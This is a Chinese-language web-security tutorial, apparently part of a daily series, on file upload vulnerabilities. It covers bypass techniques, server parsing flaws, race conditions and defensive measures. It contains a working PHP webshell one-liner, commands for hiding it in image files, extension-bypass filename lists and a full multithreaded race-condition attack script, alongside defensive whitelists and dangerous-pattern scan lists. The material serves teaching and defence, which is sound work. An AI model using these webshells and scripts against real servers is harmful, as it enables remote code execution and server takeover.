Day-039-文件上传漏洞

# Day 37: 文件上传漏洞

> Web 安全系列第 7 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [文件上传漏洞概述](#文件上传漏洞概述)
2. [漏洞原理详解](#漏洞原理详解)
3. [上传检测机制](#上传检测机制)
4. [前端绕过技术](#前端绕过技术)
5. [后端绕过技术](#后端绕过技术)
6. [解析漏洞利用](#解析漏洞利用)
7. [条件竞争攻击](#条件竞争攻击)
8. [防护策略与最佳实践](#防护策略与最佳实践)
9. [实战案例分析](#实战案例分析)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## 文件上传漏洞概述

### 什么是文件上传漏洞

文件上传漏洞是指 Web 应用未正确验证用户上传的文件，导致攻击者可以上传恶意文件（如 Webshell、恶意脚本等），从而获取服务器权限或执行其他恶意操作。

**形象理解**：
如果把网站比作一个办公楼，那么：
- **文件上传** = 前台接收快递
- **正常文件** = 正常的包裹
- **恶意文件** = 伪装的炸弹
- **漏洞** = 前台不检查包裹内容
- **后果** = 炸弹在楼内爆炸

**文件上传的危害**：
```
1. 获取服务器权限
   - 上传 Webshell
   - 执行系统命令
   - 完全控制服务器

2. 数据泄露
   - 读取敏感文件
   - 下载数据库
   - 窃取用户信息

3. 网站篡改
   - 修改网页内容
   - 植入后门
   - 传播恶意软件

4. 内网渗透
   - 以服务器为跳板
   - 攻击内网其他系统
   - 横向移动
```

**真实案例**：
```
案例 1: 某政府网站（2018）
- 漏洞：文件上传无验证
- 影响：服务器被完全控制
- 手法：上传 ASP Webshell
- 后果：敏感数据泄露

案例 2: 某电商平台（2019）
- 漏洞：头像上传解析漏洞
- 影响：数千台服务器沦陷
- 手法：图片马 + 解析漏洞
- 后果：用户数据泄露

案例 3: 某社交平台（2020）
- 漏洞：文件扩展名绕过
- 影响：攻击者获取管理员权限
- 手法：php5 扩展名绕过
- 后果：平台被接管
```

---

## 漏洞原理详解

### 为什么会发生漏洞

**根本原因**：
```
1. 信任用户输入
   - 未验证文件类型
   - 未检查文件内容
   - 直接使用文件名

2. 检测机制不足
   - 仅检查扩展名
   - 仅检查 MIME 类型
   - 可被绕过

3. 配置不当
   - 上传目录可执行
   - 服务器解析配置
   - 权限设置不当
```

**攻击流程**：
```
1. 发现上传功能
   - 头像上传
   - 文件分享
   - 文档上传

2. 测试检测机制
   - 上传正常文件
   - 上传恶意文件
   - 观察响应

3. 绕过检测
   - 修改扩展名
   - 修改 MIME 类型
   - 添加魔术字节

4. 上传 Webshell
   - 上传恶意脚本
   - 获取文件路径
   - 访问执行

5. 获取权限
   - 执行系统命令
   - 读取敏感文件
   - 横向移动
```

---

## 上传检测机制

### 前端检测

**JavaScript 检测**：
```javascript
// 检查扩展名
function checkExtension(file) {
  var allowed = ['jpg', 'jpeg', 'png', 'gif'];
  var ext = file.name.split('.').pop().toLowerCase();
  return allowed.includes(ext);
}

// 检查 MIME 类型
function checkMimeType(file) {
  var allowed = ['image/jpeg', 'image/png', 'image/gif'];
  return allowed.includes(file.type);
}

// 检查文件大小
function checkSize(file) {
  return file.size <= 5 * 1024 * 1024; // 5MB
}
```

**问题**：
```
✗ 可被绕过
✗ 禁用 JavaScript 即可
✗ 修改请求即可
✗ 不能作为唯一防护
```

### 后端检测

**扩展名检测**：
```python
# Python 示例
allowed_extensions = ['jpg', 'jpeg', 'png', 'gif']
ext = filename.split('.')[-1].lower()

if ext not in allowed_extensions:
    raise ValueError("Invalid file type")
```

**MIME 类型检测**：
```python
# Python 示例
allowed_mime = ['image/jpeg', 'image/png', 'image/gif']
mime = magic.from_buffer(file.read(1024), mime=True)

if mime not in allowed_mime:
    raise ValueError("Invalid MIME type")
```

**魔术字节检测**：
```python
# 检查文件头
def check_magic_bytes(file):
    header = file.read(4)
    
    # JPEG: FF D8 FF
    # PNG: 89 50 4E 47
    # GIF: 47 49 46 38
    
    if header.startswith(b'\xFF\xD8\xFF'):
        return 'jpeg'
    elif header.startswith(b'\x89PNG'):
        return 'png'
    elif header.startswith(b'GIF8'):
        return 'gif'
    
    return None
```

**内容检测**：
```python
# 检查文件内容是否包含恶意代码
def check_content(file):
    content = file.read()
    
    dangerous = [
        b'<?php',
        b'<script',
        b'eval(',
        b'exec(',
        b'system('
    ]
    
    for pattern in dangerous:
        if pattern in content:
            return False
    
    return True
```

---

## 前端绕过技术

### 绕过 JavaScript 检测

**方法 1: 禁用 JavaScript**
```
1. 浏览器禁用 JS
2. 直接上传恶意文件
3. 前端检测失效
```

**方法 2: 修改请求**
```
使用 Burp Suite：
1. 拦截上传请求
2. 修改文件名
3. 修改 MIME 类型
4. 转发请求
```

**方法 3: 自定义请求**
```python
# Python 脚本上传
import requests

url = 'http://target.com/upload'
files = {'file': ('shell.php', open('shell.php', 'rb'), 'image/jpeg')}
response = requests.post(url, files=files)
```

### 绕过 MIME 类型检测

```
正常请求：
Content-Type: multipart/form-data; boundary=...

Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

绕过：
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

服务器检查 MIME 类型为 image/jpeg，放行
```

---

## 后端绕过技术

### 扩展名绕过

**黑名单绕过**：
```
黑名单：php, jsp, asp, aspx

绕过：
- php5, php6, phtml, pht
- jspa, jspf, jstl
- asax, ascx, ashx
- 大小写：PhP, PHP, pHP
- 双扩展：shell.php.jpg
- 空格/点：shell.php. , shell.php.
```

**特殊扩展名**：
```
Apache:
- .php5, .php6, .phtml
- .htaccess（配置文件）

Nginx:
- 配置不当可解析任意扩展名

IIS:
- .asa, .asax, .cer
- .cdx（旧版本）

Tomcat:
- .jsp, .jspx, .jsw
- .jspf（片段文件）
```

**大小写绕过**：
```
Windows 不区分大小写：
- shell.PHP
- shell.Php
- shell.pHP

Linux 区分大小写，但可尝试：
- shell.Php（某些配置可解析）
```

**双扩展名**：
```
shell.php.jpg
shell.asp;.jpg
shell.php%00.jpg（旧版本）

原理：
- 服务器从右向左解析
- 遇到可解析扩展名停止
- .php 被解析执行
```

**特殊字符**：
```
shell.php%20
shell.php%0d%0a
shell.php/
shell.php\
shell.php.

原理：
- URL 编码
- 特殊字符
- 服务器解析差异
```

### MIME 类型绕过

```
正常图片 MIME：
image/jpeg
image/png
image/gif

绕过：
- 修改 Content-Type 为图片类型
- 文件内容仍是 PHP
- 服务器仅检查 MIME 类型
```

### 魔术字节绕过

**添加图片头**：
```php
// PHP Webshell
GIF89a
<?php system($_GET['c']); ?>

// 或
\x89PNG\x0d\x0a\x1a\x0a
<?php system($_GET['c']); ?>
```

**图片马制作**：
```bash
# 方法 1: 复制文件头
copy /b normal.jpg+shell.php shell.jpg

# 方法 2: 手动添加
echo -ne '\x89PNG\x0d\x0a\x1a\x0a' > shell.png
cat shell.php >> shell.png

# 方法 3: 使用工具
exiftool -Comment='<?php system($_GET["c"]); ?>' shell.jpg
```

---

## 解析漏洞利用

### Apache 解析漏洞

**CVE-2017-15715**：
```
漏洞：
- Apache 2.4.0-2.4.29
- 文件名含换行符可绕过黑名单

利用：
shell.php%0a.jpg

修复：
- 升级到 2.4.30+
```

**多扩展名解析**：
```
配置不当：
AddType application/x-httpd-php .jpg

利用：
shell.jpg 被当作 PHP 执行

修复：
- 正确配置 AddType
- 上传目录禁止 PHP
```

### Nginx 解析漏洞

**CVE-2013-4547**：
```
漏洞：
- Nginx 0.8.41-1.4.7 / 1.5.0-1.5.6
- 空格/点绕过

利用：
shell.php%20
shell.php.

修复：
- 升级到安全版本
```

**配置不当**：
```
错误配置：
location ~ \.php$ {
  fastcgi_pass ...
}

利用：
shell.jpg 被解析为 PHP

修复：
location ~ \.php$ {
  try_files $uri =404;
  fastcgi_pass ...
}
```

### IIS 解析漏洞

**CVE-2017-7269**：
```
漏洞：
- IIS 6.0
- WebDAV 缓冲区溢出

利用：
- 远程代码执行
- 无需上传文件

修复：
- 禁用 WebDAV
- 打补丁
```

**扩展名解析**：
```
IIS 6.0:
- /shell.asp/xxx
- /shell.asa/xxx
- /shell.cer/xxx

原理：
- IIS 6.0 解析逻辑问题
- 目录名作为扩展名

修复：
- 升级 IIS
- 配置请求过滤
```

### Tomcat 解析漏洞

**CVE-2017-12615**：
```
漏洞：
- Tomcat 7.0.0-7.0.81
- PUT 方法上传 JSP

利用：
PUT /shell.jsp/ HTTP/1.1

修复：
- 升级到 7.0.82+
- 禁用 PUT 方法
```

---

## 条件竞争攻击

### 什么是条件竞争

**原理**：
```
1. 上传文件
2. 服务器检测
3. 移动文件到目标目录
4. 删除临时文件

攻击窗口：
步骤 2-3 之间，文件存在且可访问
```

### 攻击流程

```
步骤 1: 上传恶意文件
上传 shell.php

步骤 2: 快速访问
在文件被删除前访问
http://target.com/uploads/shell.php

步骤 3: 执行代码
如果访问成功，执行命令

步骤 4: 持续尝试
多线程、多连接
增加成功概率
```

### 自动化脚本

```python
#!/usr/bin/env python3
# race_condition.py
# 条件竞争攻击脚本

import requests
import threading

TARGET = 'http://target.com'
UPLOAD_URL = f'{TARGET}/upload.php'
SHELL_URL = f'{TARGET}/uploads/shell.php'
COMMAND = 'whoami'

def upload():
    """上传文件"""
    files = {'file': ('shell.php', '<?php system($_GET["c"]); ?>')}
    requests.post(UPLOAD_URL, files=files)

def access():
    """访问文件"""
    try:
        response = requests.get(f'{SHELL_URL}?c={COMMAND}')
        if response.status_code == 200 and response.text:
            print(f'[+] 成功！输出：{response.text}')
    except:
        pass

def race():
    """条件竞争攻击"""
    for _ in range(100):
        t1 = threading.Thread(target=upload)
        t2 = threading.Thread(target=access)
        
        t1.start()
        t2.start()
        
        t1.join()
        t2.join()

if __name__ == '__main__':
    race()
```

### 防护方法

```
1. 原子操作
   上传和验证原子完成
   无中间状态

2. 随机文件名
   使用随机文件名
   攻击者无法预测路径

3. 非 Web 目录
   上传到非 Web 目录
   无法直接访问

4. 下载方式访问
   通过脚本下载
   不直接暴露文件
```

---

## 防护策略与最佳实践

### 白名单机制

**扩展名白名单**：
```python
# Python 示例
ALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif'}

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

if not allowed_file(filename):
    raise ValueError("Invalid file type")
```

**MIME 类型白名单**：
```python
ALLOWED_MIME = {
    'image/jpeg': '.jpg',
    'image/png': '.png',
    'image/gif': '.gif'
}

def check_mime(file):
    mime = magic.from_buffer(file.read(1024), mime=True)
    if mime not in ALLOWED_MIME:
        raise ValueError("Invalid MIME type")
    return True
```

### 文件重命名

**随机文件名**：
```python
import secrets
import os

def generate_filename(original_filename):
    ext = original_filename.rsplit('.', 1)[1].lower()
    random_name = secrets.token_hex(16)
    return f'{random_name}.{ext}'

# 使用
new_filename = generate_filename('shell.php')
# 结果：a1b2c3d4e5f6g7h8.jpg
```

**哈希文件名**：
```python
import hashlib
import time

def hash_filename(original_filename):
    ext = original_filename.rsplit('.', 1)[1].lower()
    hash_value = hashlib.sha256(
        f'{original_filename}{time.time()}'.encode()
    ).hexdigest()[:16]
    return f'{hash_value}.{ext}'
```

### 存储安全

**非 Web 目录**：
```
上传到非 Web 目录：
/var/uploads/  # 不在 Web 根目录

通过脚本访问：
@app.route('/download/<filename>')
def download(filename):
    file_path = os.path.join('/var/uploads', filename)
    return send_file(file_path)
```

**权限控制**：
```bash
# 设置目录权限
chmod 755 /var/uploads
chown www-data:www-data /var/uploads

# 禁止执行
# Apache
<Directory "/var/uploads">
  php_flag engine off
</Directory>

# Nginx
location /uploads/ {
  location ~ \.php$ {
    deny all;
  }
}
```

### 内容验证

**魔术字节验证**：
```python
def verify_magic_bytes(file):
    header = file.read(8)
    
    signatures = {
        b'\xFF\xD8\xFF': 'jpeg',
        b'\x89PNG\x0d\x0a\x1a\x0a': 'png',
        b'GIF87a': 'gif',
        b'GIF89a': 'gif'
    }
    
    for sig, file_type in signatures.items():
        if header.startswith(sig):
            return file_type
    
    return None
```

**内容扫描**：
```python
def scan_content(file):
    content = file.read()
    
    dangerous_patterns = [
        b'<?php',
        b'<%',
        b'<script',
        b'eval(',
        b'exec(',
        b'system(',
        b'passthru(',
        b'popen(',
        b'proc_open('
    ]
    
    for pattern in dangerous_patterns:
        if pattern in content:
            return False
    
    return True
```

### 其他防护措施

**文件大小限制**：
```python
MAX_SIZE = 5 * 1024 * 1024  # 5MB

if file.size > MAX_SIZE:
    raise ValueError("File too large")
```

**图片重新渲染**：
```python
from PIL import Image

def render_image(file):
    img = Image.open(file)
    img.save('/tmp/rendered.jpg', 'JPEG')
    return '/tmp/rendered.jpg'
```

**病毒扫描**：
```python
import clamd

def scan_virus(file):
    cd = clamd.ClamdUnixSocket()
    result = cd.scan_stream(file.read())
    
    if result['stream'][0] == 'FOUND':
        raise ValueError("Virus detected")
    
    return True
```

---

## 实战案例分析

### 案例 1: 某 CMS 文件上传漏洞

**漏洞描述**：
```
系统：某开源 CMS
漏洞：文件上传无验证
影响：远程代码执行
CVE: CVE-20XX-XXXX
```

**发现过程**：
```
1. 测试上传功能
   上传正常图片，成功

2. 测试恶意文件
   上传 shell.php，失败
   提示：不允许的文件类型

3. 尝试绕过
   shell.php.jpg → 成功
   shell.php%20 → 失败
   shell.PHP → 成功

4. 验证执行
   访问 /uploads/shell.PHP
   执行命令成功
```

**利用过程**：
```
1. 制作图片马
   copy /b normal.jpg+shell.php shell.jpg

2. 上传图片马
   通过上传功能

3. 寻找包含点
   文件被包含执行

4. 获取权限
   执行系统命令
```

**修复方案**：
```
1. 严格白名单
   仅允许 jpg, jpeg, png, gif

2. 重命名文件
   使用随机文件名

3. 存储到非 Web 目录
   通过脚本访问

4. 禁止 PHP 执行
   上传目录配置
```

### 案例 2: 某电商平台解析漏洞

**漏洞描述**：
```
平台：某大型电商
漏洞：Nginx 解析配置不当
影响：任意文件上传执行
```

**发现过程**：
```
1. 测试头像上传
   上传正常图片，成功

2. 测试 PHP 文件
   上传 shell.jpg
   访问 shell.jpg
   PHP 代码被执行

3. 分析原因
   Nginx 配置不当
   .jpg 被当作 PHP 解析
```

**Nginx 配置**：
```nginx
# 错误配置
location ~ \.php$ {
  fastcgi_pass ...
}

# 攻击者上传 shell.jpg
# 访问 shell.jpg
# 被当作 PHP 执行
```

**修复方案**：
```nginx
# 正确配置
location ~ \.php$ {
  try_files $uri =404;
  fastcgi_pass ...
}

# 上传目录禁止 PHP
location /uploads/ {
  location ~ \.php$ {
    deny all;
  }
}
```

---

## 总结与思考

### 核心要点回顾

1. **漏洞原理**
   - 未正确验证上传文件
   - 检测机制可被绕过
   - 服务器解析配置不当

2. **绕过技术**
   - 扩展名绕过
   - MIME 类型绕过
   - 解析漏洞利用

3. **防护策略**
   - 白名单机制
   - 文件重命名
   - 非 Web 目录存储

### 深入思考问题

1. **为什么文件上传漏洞依然普遍**？
   - 业务需求复杂
   - 检测与体验平衡
   - 配置管理困难

2. **云环境下的文件上传安全**？
   - 对象存储服务
   - CDN 加速
   - 新的攻击面

3. **AI 辅助检测**？
   - 图像识别
   - 内容分析
   - 行为检测

### 实战建议

**开发人员**：
1. 使用白名单
2. 文件重命名
3. 非 Web 目录存储
4. 内容验证

**安全人员**：
1. 定期测试上传功能
2. 检查服务器配置
3. 监控异常上传
4. 渗透测试

**管理层**：
1. 安全预算投入
2. 安全开发生命周期
3. 第三方组件管理
4. 事件响应预案

---

## 参考资料

### 学习资源
- [OWASP File Upload](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)
- [文件上传漏洞详解](https://www.sans.org/)

### 工具资源
- [Burp Suite](https://portswigger.net/burp)
- [Upload Scanner](https://github.com/c0d3z3r0/sudo-upload-scanner)

### 书籍推荐
- 《Web 安全深度剖析》
- 《文件上传漏洞攻防》
- 《白帽子讲 Web 安全》

---

**标记 明日预告**：Day 38 - 反序列化漏洞基础

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 37 篇，Web 安全部分第 7 篇，精编版本*